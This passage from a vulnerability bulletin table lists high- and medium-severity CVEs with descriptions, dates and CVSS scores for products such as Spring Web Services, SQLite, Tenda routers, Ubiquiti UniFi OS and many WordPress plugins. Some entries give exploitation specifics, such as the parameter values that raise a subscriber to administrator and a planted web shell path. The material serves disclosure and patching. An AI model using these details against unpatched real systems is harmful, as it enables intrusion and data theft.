| Spring--Spring Web Services | Wss4jSecurityInterceptor initialized its BSP (WS-I Basic Security Profile) compliance flag so that inbound validation disabled WSS4J BSP enforcement on RequestData. Services that validate WS-Security on the network could therefore accept messages that violate BSP rules, weakening protocol-level checks. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 8.2 | CVE-2026-40994 |
| Spring--Spring Web Services | Jaxp13XPathTemplate evaluated XPath expressions for StreamSource and SAXSource inputs using a code path that parsed attacker-controlled XML with the JDK's default DocumentBuilderFactory behavior instead of Spring's hardened parser configuration. Applications that evaluate XPath against untrusted XML payloads could therefore be exposed to XML External Entity (XXE) style attacks. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 8.2 | CVE-2026-40998 |
| Spring--Spring Web Services | When WS-Addressing is used with non-anonymous ReplyTo or FaultTo addresses, Spring WS may initiate outbound connections through configured WebServiceMessageSender instances to destinations taken directly from request headers without verifying that those destinations are safe to connect to. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 8.6 | CVE-2026-40999 |
| sqlfluff--sqlfluff | SQLFluff is a modular SQL linter and auto-formatter with support for multiple dialects and templated code. Prior to version 4.1.0, in deployments where untrusted users can provide SQL queries to be linted, an untrusted user can submit a malicious query with deliberate excessive nesting to any application using the parser to trigger a Denial of Service through resource exhaustion. This issue has been patched in version 4.1.0. | 2026-06-09 | 7.5 | CVE-2026-46373 |
| sqlfluff--sqlfluff | SQLFluff is a modular SQL linter and auto-formatter with support for multiple dialects and templated code. Prior to version 4.2.0, in deployments where untrusted users can provide SQL queries to be linted, an untrusted user can submit a malicious long query to any application using the parser to trigger a Denial of Service through resource exhaustion. This issue has been patched in version 4.2.0. | 2026-06-09 | 7.5 | CVE-2026-46374 |
| SQLite--SQLite | SQLite before 3.53.2 contains memory corruption vulnerabilities in the FTS5 full-text search extension that allow attackers to cause process crashes, memory exhaustion, or arbitrary code execution by supplying a crafted database with malformed FTS5 page data. Attackers can trigger an out-of-bounds read in fts5LeafSeek() via an attacker-controlled loop bound and a heap buffer overflow write in fts5ChunkIterate() through a crafted continuation page causing an integer underflow, exploitable when an FTS5 MATCH query is executed against the malicious database. | 2026-06-09 | 7.8 | CVE-2026-11822 |
| SQLite--SQLite | SQLite before 3.53.2 contains a heap-based buffer overflow vulnerability in the FTS5 full-text search extension that allows attackers to cause a crash or execute arbitrary code by supplying a crafted database with malicious continuation page metadata specifying a szLeaf value smaller than 4. Attackers can trigger an integer underflow in fts5ChunkIterate() causing an inflated remaining byte count during FTS5 MATCH query processing, leading to a heap buffer overflow of attacker-controlled data in applications compiled with SQLITE_ENABLE_FTS5. | 2026-06-09 | 7.8 | CVE-2026-11824 |
| STACKIT--IaaS API | STACKIT IaaS API contains a missing authorization check vulnerability that allows authenticated, low-privileged attackers to escalate privileges to full organization compromise by attaching arbitrary service accounts to virtual machines they control. Attackers can exploit the unvalidated PUT servers service-accounts endpoint to attach high-privileged service accounts and query the Instance Metadata Service to retrieve OAuth2 tokens, bypassing tenant boundaries and gaining unauthorized control over the entire organization environment. | 2026-06-08 | 9.8 | CVE-2026-39910 |
| stefanbohacek--fediverse-embeds-wordpress-plugin | Fediverse Embeds embeds fediverse posts on WordPress sites. Prior to version 1.5.8, Fediverse Embeds registered an unauthenticated REST route ftf/media-proxy (includes/Media_Proxy.php) with permission_callback => __return_true that accepted a base64-encoded URL and forwarded it to wp_remote_get($url) without enforcing any allowlist. The plugin's source contained a comment block explicitly acknowledging that the request should be validated against allowed fediverse domains, but in 1.5.7 the validation only set a local $can_download_media flag that was never read. The full response body was echoed back to the caller, so this was a full-read SSRF / open proxy reachable by any anonymous visitor. This issue has been patched in version 1.5.8. | 2026-06-11 | 7.5 | CVE-2026-46697 |
| steipete--summarize | Summarize before 0.17.0 contains a server-side request forgery vulnerability that allows attackers who control a podcast RSS feed to direct the host to fetch transcript content from loopback addresses, link-local addresses, RFC 1918 private ranges, or other reserved destinations by supplying malicious podcast:transcript URL values. Attackers can bypass protections through DNS rebinding and redirect-based techniques, as redirect targets are not revalidated and hostnames are not resolved before request dispatch, exposing internal service responses through the summarization flow. | 2026-06-11 | 7.4 | CVE-2026-53782 |
| stiofansisland--Events Calendar for GeoDirectory | The Events Calendar for GeoDirectory plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 2.3.28. This is due to the ajax_ayi_action() handler only applying strip_tags(esc_sql()) - with no allow-list - to the attacker-controlled $_POST['type'] and $_POST['postid'] values before forwarding them to update_ayi_data(), which calls update_user_meta($current_user->ID, $rsvp_args['type'], $posts). By passing type=wp_capabilities and postid=administrator, an attacker writes ['subscriber'=>true,'administrator'=>'administrator'] into their own wp_capabilities user meta; WP_User::get_role_caps() then treats the 'administrator' array key as an active role on the next request. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to Administrator. | 2026-06-09 | 8.8 | CVE-2026-11616 |
| sveltejs--devalue | Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From version 5.6.3 to before version 5.8.1, devalue.parse could, due to quirks in some JavaScript engines, be convinced to allocate much more memory than was needed when deserializing sparse arrays, leading to excessive memory consumption. This issue has been patched in version 5.8.1. | 2026-06-09 | 7.5 | CVE-2026-42570 |
| Systerel--S2OPC | Improper comparison with the trusted certificates list in S2OPC allows an attacker's well-formed untrusted certificate to be considered trusted. | 2026-06-10 | 7.3 | CVE-2026-9758 |
| tale--headplane | Headplane is a feature-complete Web UI for Headscale. Prior to versions 0.6.3 and 0.7.0-beta.3, Headplane was vulnerable to a path traversal / authorization bypass in the Headscale API client used by node and user rename operations. This issue has been patched in versions 0.6.3 and 0.7.0-beta.3. | 2026-06-08 | 8.1 | CVE-2026-46484 |
| taosdata--TDengine | TDengine is an open source, time-series database optimized for Internet of Things devices. In versions 3.4.0.0 through 3.4.1.5, an unauthenticated remote attacker can crash the taosd server process by sending a single crafted RPC packet. No credentials or prior session state are required. Version 3.4.1.6 fixes the issue. | 2026-06-10 | 7.5 | CVE-2026-42542 |
| Tenda--AC18 | A vulnerability was found in Tenda AC18 15.03.05.05. The affected element is the function sub_45304 of the file /goform/getRebootStatus of the component Web Management Interface. The manipulation of the argument callback results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-06-08 | 8.8 | CVE-2026-11528 |
| Tenda--CX12L | A security vulnerability has been detected in Tenda CX12L 16.03.53.12. The affected element is the function form_fast_setting_wifi_set of the file /goform/fast_setting_wifi_set of the component Wi-Fi Configuration Endpoint. Such manipulation of the argument ssid leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 8.8 | CVE-2026-11503 |
| Tenda--CX12L | A vulnerability was detected in Tenda CX12L 16.03.53.12. The impacted element is the function setSchedWifi of the file /goform/openSchedWifi of the component Wi-Fi Schedule Configuration Endpoint. Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-based buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. | 2026-06-08 | 8.8 | CVE-2026-11504 |
| Tenda--F451 | A security flaw has been discovered in Tenda F451 1.0.0.7/1.0.0.9. Impacted is the function formWriteFacMac of the file /goform/WriteFacMac of the component Web Management Interface. Performing a manipulation of the argument mac results in OS command injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 8.8 | CVE-2026-11556 |
| Tenda--F451 | A weakness has been identified in Tenda F451 1.0.0.7/1.0.0.9. The affected element is the function fromNatlimit of the file /goform/Natlimit of the component Web Management Interface. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-08 | 8.8 | CVE-2026-11557 |
| Tenda--HG7HG9 | A vulnerability was determined in Tenda HG7HG9 and HG10 300001138_en_xpon. This affects the function formDOMAINBLK of the file /boaform/formDOMAINBLK. Executing a manipulation of the argument blkDomain can lead to stack-based buffer overflow. The attack may be performed from remote. | 2026-06-08 | 9.8 | CVE-2026-11499 |
| Tenda--HG7HG9 | A vulnerability was found in Tenda HG7HG9 and HG10 300001138_en_xpon. Affected by this issue is the function asp_voip_OtherSet of the file /boaform/voip_other_set of the component Web Management Interface. Performing a manipulation of the argument funckey_transfer results in stack-based buffer overflow. The attack can be carried out remotely. | 2026-06-08 | 8.8 | CVE-2026-11498 |
| Tenda--HG7HG9 | A vulnerability was found in Tenda HG7HG9 and HG10 300001138_en_xpon. This affects the function formPPPEdit of the file /boaform/formPPPEdit. The manipulation of the argument encodename results in stack-based buffer overflow. The attack can be launched remotely. The exploit has been made public and could be used. | 2026-06-08 | 8.8 | CVE-2026-11553 |
| Tenda--W20E | A vulnerability was detected in Tenda W20E 15.11.0.6. This vulnerability affects the function formSetPortMirror of the file /goform/setPortMirror. Performing a manipulation of the argument portMirrorMirroredPorts results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used. | 2026-06-08 | 8.8 | CVE-2026-11522 |
| Tenda--W20E | A flaw has been found in Tenda W20E 15.11.0.6. This issue affects the function formPortalAuth of the file /goform/PortalAuth of the component Web Management Interface. Executing a manipulation of the argument gotoUrl can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. | 2026-06-08 | 8.8 | CVE-2026-11523 |
| Tenda--W20E | A vulnerability has been found in Tenda W20E 15.11.0.6. Impacted is the function modifyWifiFilterRules of the file /goform/modifyWifiFilterRules of the component Web Management Interface. The manipulation of the argument wifiFilterListRemark leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 8.8 | CVE-2026-11524 |
| Themeisle--Woody Code Snippets | WordPress Insert PHP plugin versions before 3.3.1 contain a PHP code injection vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by injecting malicious shortcodes through the WordPress REST API. Attackers can send POST requests to the wp-json/wp/v2/posts endpoint with crafted content containing insert_php shortcodes to include and execute remote PHP files on the server. | 2026-06-09 | 9.8 | CVE-2017-20251 |
| Ubiquiti Inc--UDM | Under certain network configurations, a malicious actor with access to network could exploit an Improper Access Control vulnerability found in certain devices running UniFi OS to make unauthorized changes to such UniFi OS devices. | 2026-06-12 | 8.1 | CVE-2026-48610 |
| Ubiquiti Inc--UID Enterprise Agent | A malicious actor with access to the network and low privileges could exploit an Improper Input Validation vulnerability found in UID Enterprise Agent to execute a Command Injection on the host device. | 2026-06-12 | 9.9 | CVE-2026-47367 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network and low privileges could exploit an Improper Input Validation vulnerability found in certain devices running UniFi OS to escalate privileges within such UniFi OS devices or instances. | 2026-06-12 | 9.9 | CVE-2026-47369 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network and low privileges could exploit an Improper Input Validation vulnerability found in certain devices running UniFi OS to execute a Command Injection within such UniFi OS devices or instances. | 2026-06-12 | 9.9 | CVE-2026-47370 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network could exploit a Path Traversal vulnerability found in certain devices running UniFi OS to obtain data from such UniFi OS devices or instances. | 2026-06-12 | 8.6 | CVE-2026-47368 |
| UTT--HiPER 2610G | A vulnerability was determined in UTT HiPER 2610G up to 3.0.0-171107. This impacts the function strcpy of the file /goform/formConfigDnsFilterGlobal. Executing a manipulation of the argument GroupName can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 8.8 | CVE-2026-11517 |
| VMware--VCF operations | VMware Cloud Foundation Operations contains multiple stored cross-site scripting vulnerabilities. A malicious actor with privileges to create policies, views or text-widgets may be able to inject scripts to perform administrative actions in VMware Cloud Foundation Operations. | 2026-06-08 | 8 | CVE-2026-41722 |
| VMware--VCF operations | VMware Cloud Foundation Operations contains multiple stored cross-site scripting vulnerabilities. A malicious actor with privileges to create policies, views or text-widgets may be able to inject scripts to perform administrative actions in VMware Cloud Foundation Operations. | 2026-06-08 | 8 | CVE-2026-41723 |
| VMware--VCF operations | VMware Cloud Foundation Operations contains multiple stored cross-site scripting vulnerabilities. A malicious actor with privileges to create policies, views or text-widgets may be able to inject scripts to perform administrative actions in VMware Cloud Foundation Operations. | 2026-06-08 | 8 | CVE-2026-41724 |
| VS Revo--RevoUninstaller | A vulnerability was identified in VS Revo RevoUninstaller 2.5.x/2.6.x. The affected element is the function IOCtl_Handler in the library RevoDetector.sys of the component IOCTL Handler. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. Upgrading to version 2.7.0 is sufficient to fix this issue. It is recommended to upgrade the affected component. | 2026-06-14 | 7.8 | CVE-2026-12193 |
| WBW Plugins--Product Filter by WBW | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WBW Plugins Product Filter by WBW allows Blind SQL Injection. This issue affects Product Filter by WBW: from n/a through 3.1.2. | 2026-06-11 | 9.3 | CVE-2026-39494 |
| webandprint--Augmented Reality | WordPress Augmented-Reality plugin contains a remote code execution vulnerability in the elFinder connector that allows unauthenticated attackers to upload and execute arbitrary PHP files. Attackers can send POST requests to the connector.minimal.php endpoint with mkfile and put commands to create malicious PHP files in the file_manager directory and execute them on the server. | 2026-06-08 | 7.5 | CVE-2023-54350 |
| WebPros--WordPress-Toolkit | Argument injection vulnerability in WordPress Toolkit before 6.11.0 as used in cPanel & WHM, allows remote authenticated users to bypass cross-tenant authorization and execute arbitrary wp-toolkit CLI commands as another account. | 2026-06-12 | 9.9 | CVE-2026-47365 |
| Wow-Company--Wow Forms | Wow Forms WordPress Plugin version 2.1 contains an SQL injection vulnerability that allows unauthenticated attackers to read arbitrary database information by exploiting an unescaped POST parameter. Attackers can inject SQL code through the 'mwpformid' parameter in requests to the admin-ajax.php endpoint with the 'send_mwp_form' action to extract sensitive database contents. | 2026-06-09 | 8.2 | CVE-2017-20244 |
| Wow-Company--Wow Viral Signups | Wow Viral Signups 2.1 WordPress plugin contains an SQL injection vulnerability that allows unauthenticated attackers to extract database information by exploiting the unescaped 'idsignup' POST parameter. Attackers can send crafted requests to the admin-ajax.php endpoint with malicious SQL payloads in the 'idsignup' parameter to read arbitrary data from the database. | 2026-06-09 | 8.2 | CVE-2017-20245 |
| WP Travel Kit--Travelscape | WordPress Seotheme contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by uploading malicious files to the theme directory. Attackers can access the uploaded PHP shell at /wp-content/themes/seotheme/mar.php to execute system commands and upload additional files for persistent access. | 2026-06-08 | 9.8 | CVE-2023-54352 |
| WP Travel Kit--Travelscape | WordPress Theme Travelscape 1.0.3 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by exploiting insufficient validation in the theme's upload functionality. Attackers can upload arbitrary files to the theme directory and execute them to achieve remote code execution on the affected WordPress installation. | 2026-06-08 | 9.8 | CVE-2024-58349 |
| WPVibes--WP Mail Log | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in WPVibes WP Mail Log allows DOM-Based XSS. This issue affects WP Mail Log: from n/a through 1.0.2. | 2026-06-11 | 7.1 | CVE-2023-33999 |
| WPZOOM--WPZOOM Portfolio | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM Portfolio allows Reflected XSS. This issue affects WPZOOM Portfolio: from n/a through 1.4.21. | 2026-06-10 | 7.1 | CVE-2026-49069 |
| xibosignage--xibo-cms | Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.2, a vulnerability chain consisting of Stored XSS and Iframe Sandbox escape in the Xibo CMS allows users with DataSet permissions to use the Data Connector functionality to craft messages which escape the sandbox and facilitate XSS. Exploitation of the vulnerability is possible on behalf of an authorized user who has both of the following privileges, which are not granted to non-admins as standard: Include "Add DataSet" button to allow for additional DataSets to be created independently to Layouts. Users should upgrade to version 4.4.2, which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust. | 2026-06-10 | 7.6 | CVE-2026-42558 |
| Yarbo--Yarbo Android/IOS mobile application | The Yarbo Android and iOS applications contain hard-coded MQTT broker credentials that are identical for all users and all devices. These credentials are embedded in the application binary and are readily extractable via APK decompilation. The credentials provide access to cloud MQTT brokers carrying real-time telemetry for the entire global Yarbo robot fleet. They allow both wildcard subscription to all robot telemetry topics and publishing to any robot's command topic using only the robot's serial number. | 2026-06-12 | 9.8 | CVE-2026-10557 |
| Yarbo--Yarbo Android/IOS mobile application | The Yarbo cloud does not enforce per-device or per-user authorization. Any client possessing valid credentials, whether the shared hard-coded credentials or legitimate per-user credentials, can subscribe to wildcard topics covering all robots globally, and can publish to any robot's command topic using only the robot's serial number (disclosed in the telemetry stream). Even after removal of hard-coded credentials from the app, a single compromised credential could still provide fleet-wide access without per-device access controls. | 2026-06-12 | 8.1 | CVE-2026-7368 |
| YesWiki--yeswiki | YesWiki is a wiki system written in PHP. Prior to version 4.6.6, an unsafe execution vulnerability exists in the Bazar form field calculator (CalcField.php) of YesWiki. The application attempts to sanitize user-defined mathematical formulas using a complex recursive regular expression before passing them to the PHP eval() function. This implementation is inherently flawed: it is vulnerable to Regular Expression Denial of Service (ReDoS / Stack Overflow) which can crash the server, and it creates a high-risk architecture where any logic bypass directly results in arbitrary PHP code execution. Version 4.6.6 patches the issue. | 2026-06-08 | 9.8 | CVE-2026-52778 |
| zephyrproject-rtos--Zephyr | A remote, unauthenticated attacker can trigger memory corruption in Zephyr's HTTP server WebSocket upgrade path by sending a crafted Sec-WebSocket-Key header. The HTTP/1 header parser copies the header into a fixed-size buffer using a bounded copy that does not guarantee NUL termination when the input length reaches the buffer size. During upgrade handling the buffer is copied to a local stack buffer and passed to strlen(); if no NUL exists in-bounds, strlen() reads beyond the stack buffer and subsequent concatenation with the WebSocket magic string can write out of bounds. This leads to out-of-bounds read and write on stack memory, resulting in crash (denial of service) and potentially code execution. The path is reachable when CONFIG_HTTP_SERVER_WEBSOCKET is enabled. | 2026-06-09 | 9.8 | CVE-2026-5067 |
| zephyrproject-rtos--Zephyr | A remote, unauthenticated BLE peer can trigger a 2-byte out-of-bounds write in the Bluetooth host during L2CAP LE CoC SDU reassembly. When the application enables segmentation (via chan_ops.alloc_buf) and the chosen RX pool has a user_data_size smaller than 2 bytes, the segmentation counter stored in the net_buf user_data area is written out of bounds in l2cap_chan_le_recv_seg (subsys/bluetooth/host/l2cap.c). The observed effects are an AddressSanitizer abort and, without ASan, heap corruption / fatal error. | 2026-06-09 | 7.6 | CVE-2026-5068 |
| Zoom Communications--Remote Control for Zoom Contact Center | Insufficient Verification of Data Authenticity in Remote Control for Zoom Contact Center for Windows before version 7.0.0 may allow an authenticated user to enable an escalation of privilege via local access. | 2026-06-12 | 7.8 | CVE-2026-53406 |
| Zoom Communications--Zoom Workplace | Improper Authorization in Handler for Custom URL Scheme in Zoom Workplace before version 7.0.4 for Android and before 7.0.3 for iOS may allow an unauthenticated user to conduct an escalation of privilege via network access. | 2026-06-12 | 8.1 | CVE-2026-53407 |
| Zoom Communications--Zoom Workplace | Improper Authorization in Handler for Custom URL Scheme in Zoom Workplace before version 7.0.4 for Android and before 7.0.3 for iOS may allow an unauthenticated user to conduct an escalation of privilege via network access. | 2026-06-12 | 8.1 | CVE-2026-53408 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 100plugins--Open User Map PRO | The Open User Map PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'oum_location_notification' parameter in versions up to, and including, 1.4.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-11 | 4.7 | CVE-2026-2827 |
| 2winfactor--Presto Player | The Presto Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link_url' parameter of the [presto_player_overlay] shortcode in versions up to, and including, 4.2.0. This is due to insufficient input sanitization and output escaping in the getOverlays() function, which copies the link_url shortcode attribute directly into the overlay configuration without scheme validation, allowing javascript: URIs to survive and be rendered as the href of a clickable anchor element by the presto-dynamic-overlay-ui web component. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-12 | 6.4 | CVE-2026-9125 |
| 360crest--TinyMCE shortcode Addon | The TinyMCE shortcode Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'btnrel' Shortcode Attribute in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-10024 |
| ABB--Freelance | Authentication bypass by primary weakness vulnerability in ABB Freelance. This issue affects Freelance: through 2013, 2013 SP1, 2016, 2016 SP1, 2019, 2019 SP1, 2019 SP1 FP1, 2024. | 2026-06-11 | 6.6 | CVE-2025-7064 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47923 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47924 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47925 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47926 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47961 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-34692 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47935 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47936 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47939 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47941 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47942 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47943 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47944 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47945 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47946 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47947 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47948 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47949 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47950 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47951 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47953 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47954 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47956 |
